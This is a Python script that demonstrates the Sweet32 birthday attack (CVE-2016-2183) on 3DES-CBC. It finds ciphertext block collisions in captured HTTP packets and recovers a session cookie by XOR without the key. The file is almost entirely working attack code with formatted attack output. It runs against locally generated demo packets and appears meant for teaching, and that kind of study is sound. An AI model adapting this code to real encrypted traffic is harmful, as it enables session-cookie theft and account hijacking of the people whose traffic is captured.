#!/usr/bin/env python3

import argparse
import math
from lib import packetfile
from lib.tridescbc import DEMO_BLOCK_SIZE, BLOCK_SIZE

"""
Sweet32 - Birthday attack on 3DES (64-bit block cipher).

This is a demonstration of the Sweet32 attack (CVE-2016-2183) which exploits
the small 64-bit block size of 3DES through birthday collisions.
See: https://sweet32.info/

The Beastly Attack Scenario:
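When two ciphertext blocks collide (c_i = c_j) under the same key, the block
cipher inputs must have been equal in CBC mode: p_i ⊕ c_{i-1} = p_j ⊕ c_{j-1}.
Rearranging this lets us recover the unknown plaintext:
    p_i = p_j ⊕ c_{i-1} ⊕ c_{j-1}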

Where:
- p_i is the unknown plaintext (cookie block)
- p_j is a known plaintext block
- c_{i-1} and c_{j-1} are the previous ciphertext blocks

The attack works WITHOUT knowing the encryption key - only by observing
enough encrypted traffic to find collisions.
"""

# Known plaintext template for HTTP requests (? marks unknown bytes).
# Sweet32Attack hard-codes byte offsets into this exact text: the request ID
# spans bytes 17-27 and the session cookie bytes 376-408 (end exclusive).
# Changing any text before those ranges shifts the offsets and breaks the
# block indexing. The template is 409 characters long, so its last 8-byte
# block holds only the trailing "\n".
REQUEST_PLAIN_TEXT = """GET /nonexistent/?????????? HTTP/1.1
Host: localhost:5000
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: session=????????????????????????????????
"""

# Known plaintext template for HTTP responses (? marks unknown bytes).
# The Date value spans bytes 110-139 (end exclusive), matching the offsets
# hard-coded in Sweet32Attack._get_date_block_locations. The attack loop
# currently scans only requests, so this template is split into blocks but
# not otherwise used.
RESPONSE_PLAIN_TEXT = """HTTP/1.0 404 NOT FOUND
Content-Type: text/html
Content-Length: 233
Server: Werkzeug/0.12.2 Python/3.5.2
Date: ?????????????????????????????
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server.</p>
"""


class Sweet32Attack:
    """Execute the Sweet32 birthday attack on 3DES-CBC encrypted packets.

    Ciphertext blocks at known-plaintext positions of every captured request
    are matched against the ciphertext blocks that cover the session cookie.
    Each match lets one cookie block be recovered with
    ``p_i = p_j ⊕ c_{i-1} ⊕ c_{j-1}``, without knowing the key.

    Attributes:
        block_size: Ciphertext bytes per block used for collision matching
            (possibly a truncation of the real 3DES block).
        index_block_size: Real 3DES block size (``BLOCK_SIZE``), used to
            index into the plaintext templates.
        known_plain_texts: ``{"request": [...], "response": [...]}`` holding
            the templates split into ``index_block_size``-character blocks.
        cookie_location, index_location, date_location: ``range`` objects of
            block indices covering the cookie, request ID and date.
        round_trips: Packets returned by ``packetfile.read_packets``.
        encrypted_cookie_blocks: Cookie ciphertext block -> info dict (see
            ``_find_encrypted_cookie_blocks``).
        decrypted_cookie_blocks: Recovered cookie blocks as ``str``, or
            ``None`` for blocks not yet recovered.
    """

    def __init__(self, filename, block_size_bytes=None):
        """Load packets from *filename* and precompute the attack lookup tables.

        Args:
            filename: Packet file passed to ``packetfile.read_packets``.
            block_size_bytes: Ciphertext bytes per block used for collision
                matching. ``None`` selects ``DEMO_BLOCK_SIZE``.
        """
        # Use demo block size by default for reading truncated ciphertext.
        if block_size_bytes is None:
            block_size_bytes = DEMO_BLOCK_SIZE
        self.block_size = block_size_bytes

        # Block indexing is ALWAYS based on real 8-byte 3DES blocks; the
        # truncation is only for faster collision detection.
        self.index_block_size = BLOCK_SIZE
        index_block_size = self.index_block_size

        # Split known plaintexts into 8-byte blocks (matching 3DES).
        self.known_plain_texts = {
            "request": self._split_text_into_blocks(REQUEST_PLAIN_TEXT, index_block_size),
            "response": self._split_text_into_blocks(RESPONSE_PLAIN_TEXT, index_block_size),
        }

        # Calculate block locations using the 8-byte block size.
        self.cookie_location = self._get_cookie_block_locations(index_block_size)
        self.index_location = self._get_request_id_block_locations(index_block_size)
        self.date_location = self._get_date_block_locations(index_block_size)

        # Load encrypted packets (with truncated cipher blocks for collision matching).
        self.round_trips = packetfile.read_packets(filename, block_size_bytes)

        # Find all encrypted cookie blocks and their previous blocks.
        self.encrypted_cookie_blocks = self._find_encrypted_cookie_blocks(self.round_trips)

        # One slot per cookie block; None until recovered.
        self.decrypted_cookie_blocks = [None] * len(self.cookie_location)

    @staticmethod
    def _split_text_into_blocks(text, block_size):
        """Split *text* into consecutive *block_size* chunks (last may be shorter)."""
        return [text[i:i + block_size] for i in range(0, len(text), block_size)]

    @staticmethod
    def _get_cookie_block_locations(block_size):
        """Return the block indices that overlap the cookie in requests."""
        start_index = 376  # "Cookie: session=" ends here
        end_index = 408    # 32-char cookie ends here
        return Sweet32Attack._index_to_block_index(start_index, end_index, block_size)

    @staticmethod
    def _get_request_id_block_locations(block_size):
        """Return the block indices that overlap the variable request ID."""
        return Sweet32Attack._index_to_block_index(17, 27, block_size)

    @staticmethod
    def _get_date_block_locations(block_size):
        """Return the block indices that overlap the variable Date in responses."""
        return Sweet32Attack._index_to_block_index(110, 139, block_size)

    @staticmethod
    def _index_to_block_index(start_index, end_index, block_size):
        """Convert the byte span [start_index, end_index) to a range of block indices.

        Every block that overlaps the span at all is included.
        """
        start_block_index = start_index // block_size
        end_block_index = math.ceil(end_index / block_size)
        return range(start_block_index, end_block_index)

    def _find_encrypted_cookie_blocks(self, encrypted_round_trips):
        """Build a lookup of every encrypted cookie block across all requests.

        Maps ``cipher_block -> {"prev_full": ..., "index": ...}`` where
        ``cipher_block`` is the (possibly truncated) block used as the
        collision key, ``prev_full`` is the FULL previous ciphertext block
        (or the IV for block 0), and ``index`` is the position within the
        cookie. The XOR recovery formula needs full blocks, which is why
        ``prev_full`` comes from ``cipher_full`` when that key is present.
        If two cookie blocks share the same key, the later one wins.
        """
        encrypted = {}
        for round_trip in encrypted_round_trips:
            cipher = round_trip['request']['cipher']  # Truncated blocks
            cipher_full = round_trip['request'].get('cipher_full', cipher)  # Full 8-byte blocks
            iv = round_trip['request']['iv']

            for location in self.cookie_location:
                if location >= len(cipher):
                    continue
                # c_{i-1}: previous FULL ciphertext block, or the IV for block 0.
                prev_full = cipher_full[location - 1] if location > 0 else iv
                encrypted[cipher[location]] = {
                    "prev_full": prev_full,  # Full 8-byte block for XOR
                    "index": location - self.cookie_location[0],
                }
        return encrypted

    def execute_attack(self):
        """Execute the Sweet32 birthday attack and report the result.

        Scans every request for collisions between ciphertext blocks at
        fully-known plaintext positions and any encrypted cookie block from
        ANY request. Each collision is exploited with
        ``p_i = p_j ⊕ c_{i-1} ⊕ c_{j-1}``.

        This works across packets because when c_i = c_j the INPUTS to the
        block cipher are equal: (p_i ⊕ c_{i-1}) = (p_j ⊕ c_{j-1}). The IV is
        just c_{-1} for block 0, so the formula handles it.

        Returns:
            ``self.decrypted_cookie_blocks``: recovered blocks as ``str``,
            ``None`` where not yet recovered.
        """
        print()
        print("=" * 60)
        print("           SWEET32 BIRTHDAY ATTACK (CVE-2016-2183)")
        print("=" * 60)
        print(f"[*] Loaded {len(self.round_trips)} encrypted packets")
        print(f"[*] Block size: {self.block_size} bytes ({self.block_size * 8} bits)")
        print(f"[*] Cookie location: blocks {self.cookie_location[0]}-{self.cookie_location[-1]} (bytes 376-408)")
        print(f"[*] Tracking {len(self.encrypted_cookie_blocks)} encrypted cookie blocks")
        print()
        print("[*] Scanning for birthday collisions...")
        print("-" * 60)

        collision_count = 0
        known_blocks = self.known_plain_texts["request"]

        for round_trip in self.round_trips:
            request = round_trip['request']

            for i, cipher_block in enumerate(request['cipher']):
                # Skip blocks that contain unknown data (cookie, request ID).
                if i in self.cookie_location or i in self.index_location:
                    continue
                # Skip blocks whose plaintext is not fully known: indices past
                # the end of the template, and the short final template block
                # (its remaining bytes are not in the template, presumably
                # padding). Exploiting them would store a truncated "recovered"
                # cookie block that also blocks later correct recoveries.
                if i >= len(known_blocks) or len(known_blocks[i]) < self.index_block_size:
                    continue

                # Does this block match any cookie block from ANY packet?
                if cipher_block in self.encrypted_cookie_blocks:
                    collision_count += 1
                    known_plain = known_blocks[i]
                    print(f"[!] COLLISION #{collision_count} FOUND!")
                    print(f"    Known block {i} ciphertext: {cipher_block.hex()}")
                    print(f"    Known plaintext: {repr(known_plain)}")
                    print("    Matches a cookie block!")
                    self._exploit_collision(request, known_blocks, i)
                    print()

            # Stop scanning once the entire cookie has been recovered.
            if self._cookie_is_fully_decrypted():
                break

        print("-" * 60)
        print()

        if self._cookie_is_fully_decrypted():
            print("=" * 60)
            print("                    ATTACK SUCCESSFUL!")
            print("=" * 60)
            cookie_str = ''.join(self.decrypted_cookie_blocks)
            # Recovered chars come from chr(byte), so latin-1 maps them back 1:1.
            cookie_hex = cookie_str.encode('latin-1').hex()
            print(f"[+] Recovered FULL cookie after {collision_count} collision(s)!")
            print()
            print(f"    RECOVERED COOKIE (hex): {cookie_hex}")
            print(f"    RECOVERED COOKIE (raw): {repr(cookie_str)}")
            print("=" * 60)
        else:
            recovered = sum(1 for x in self.decrypted_cookie_blocks if x is not None)
            print("=" * 60)
            print("                  PARTIAL RECOVERY")
            print("=" * 60)
            print(f"[+] Recovered {recovered}/{len(self.decrypted_cookie_blocks)} cookie blocks")
            print()
            for block_num, block in enumerate(self.decrypted_cookie_blocks, start=1):
                if block is not None:
                    block_hex = block.encode('latin-1').hex()
                    print(f"    Block {block_num}: {block_hex}  ← RECOVERED!")
                else:
                    print(f"    Block {block_num}: ????????????????  (need more collisions)")
            print()
            print("[*] Need more encrypted traffic for complete recovery!")
            print("=" * 60)
            print()
            print("Compare with the SECRET COOKIE from generate_rigged_packets.py:")
            print("If Block 1 matches the 'First 8 bytes (hex)', the attack worked!")

        return self.decrypted_cookie_blocks

    def _cookie_is_fully_decrypted(self):
        """Return True when every cookie block has been recovered."""
        return all(x is not None for x in self.decrypted_cookie_blocks)

    def _exploit_collision(self, ciphertext, plaintext, block_index):
        """Exploit a collision to recover one cookie block.

        When c_i = c_j (collision on truncated blocks), we use
        ``p_i = p_j ⊕ c_{i-1} ⊕ c_{j-1}``.

        FULL 8-byte blocks are used for the XOR even though the collision
        was detected on truncated blocks: a truncated match only approximates
        a full-block collision, but the XOR needs full blocks to produce a
        full 8-byte plaintext. In demo mode a partial collision can therefore
        yield an incorrect block. An already-recovered cookie block is never
        overwritten.

        Args:
            ciphertext: Request dict containing the known-plaintext block
                (``'cipher'``, ``'iv'`` and optionally ``'cipher_full'``).
            plaintext: Known plaintext blocks of that request.
            block_index: Index of the colliding block in the known plaintext.
        """
        cipher = ciphertext['cipher']  # Truncated blocks for collision key
        cipher_full = ciphertext.get('cipher_full', cipher)  # Full blocks for XOR
        iv = ciphertext['iv']
        cookie_block_info = self.encrypted_cookie_blocks[cipher[block_index]]

        # Skip if we've already recovered this cookie block.
        if self.decrypted_cookie_blocks[cookie_block_info["index"]] is not None:
            return

        # p_j: the known plaintext block.
        known_plain = plaintext[block_index]

        # c_{j-1}: FULL previous ciphertext block of the known block (IV for block 0).
        prev_known = cipher_full[block_index - 1] if block_index != 0 else iv

        # c_{i-1}: FULL previous ciphertext block of the cookie block.
        prev_cookie = cookie_block_info["prev_full"]

        # p_i = p_j ⊕ c_{i-1} ⊕ c_{j-1}
        cookie_plain = self._recover_plaintext(known_plain, prev_known, prev_cookie)

        self.decrypted_cookie_blocks[cookie_block_info["index"]] = cookie_plain

    @staticmethod
    def _recover_plaintext(known_plain, prev_known_cipher, prev_cookie_cipher):
        """Recover unknown plaintext using ``p_i = p_j ⊕ c_{i-1} ⊕ c_{j-1}``.

        Args:
            known_plain: Known plaintext block (p_j), ``str`` or bytes-like.
            prev_known_cipher: Previous ciphertext block of the known block (c_{j-1}).
            prev_cookie_cipher: Previous ciphertext block of the cookie block (c_{i-1}).

        Returns:
            The recovered plaintext as a ``str`` of ``chr(byte)`` characters.
            Its length is that of the shortest input, since ciphertext may be
            truncated in demo mode.
        """
        if isinstance(known_plain, str):
            known_plain = known_plain.encode()

        # zip stops at the shortest input, matching the demo-mode truncation.
        return ''.join(
            chr(p ^ a ^ b)
            for p, a, b in zip(known_plain, prev_known_cipher, prev_cookie_cipher)
        )


def main(filename, block_size_bytes):
    """Run the Sweet32 attack against the packets stored in *filename*.

    Args:
        filename: Path of the packet file to attack.
        block_size_bytes: Ciphertext bytes per block used for collision
            matching; ``None`` lets ``Sweet32Attack`` pick its demo default.

    Returns:
        Whatever ``Sweet32Attack.execute_attack`` returns (the list of
        recovered cookie blocks).
    """
    return Sweet32Attack(filename, block_size_bytes).execute_attack()


if __name__ == "__main__":
    # Command-line entry point: parse arguments, validate them, run the attack.
    parser = argparse.ArgumentParser(
        description='Sweet32 birthday attack on 3DES encrypted packets (CVE-2016-2183)')
    parser.add_argument('file', type=str,
                        help="File to read packets from. Use generate_packets.py to create the file")
    parser.add_argument('--block-size', type=int, default=DEMO_BLOCK_SIZE,
                        help=f"Block size in bytes. Defaults to {DEMO_BLOCK_SIZE} bytes (demo mode).")

    args = parser.parse_args()
    # --block-size selects how many bytes of each 8-byte 3DES ciphertext block
    # are used for collision matching (a truncation), so only 1..BLOCK_SIZE
    # is meaningful. Reject anything else up front instead of running the
    # attack on nonsensical block slices.
    if not 1 <= args.block_size <= BLOCK_SIZE:
        parser.error(f"--block-size must be between 1 and {BLOCK_SIZE}")
    main(args.file, args.block_size)
